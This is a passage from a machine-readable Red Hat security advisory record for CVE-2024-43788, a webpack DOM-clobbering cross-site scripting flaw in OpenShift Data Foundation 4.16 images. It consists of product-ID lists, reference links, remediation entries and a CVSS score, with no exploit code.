"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", 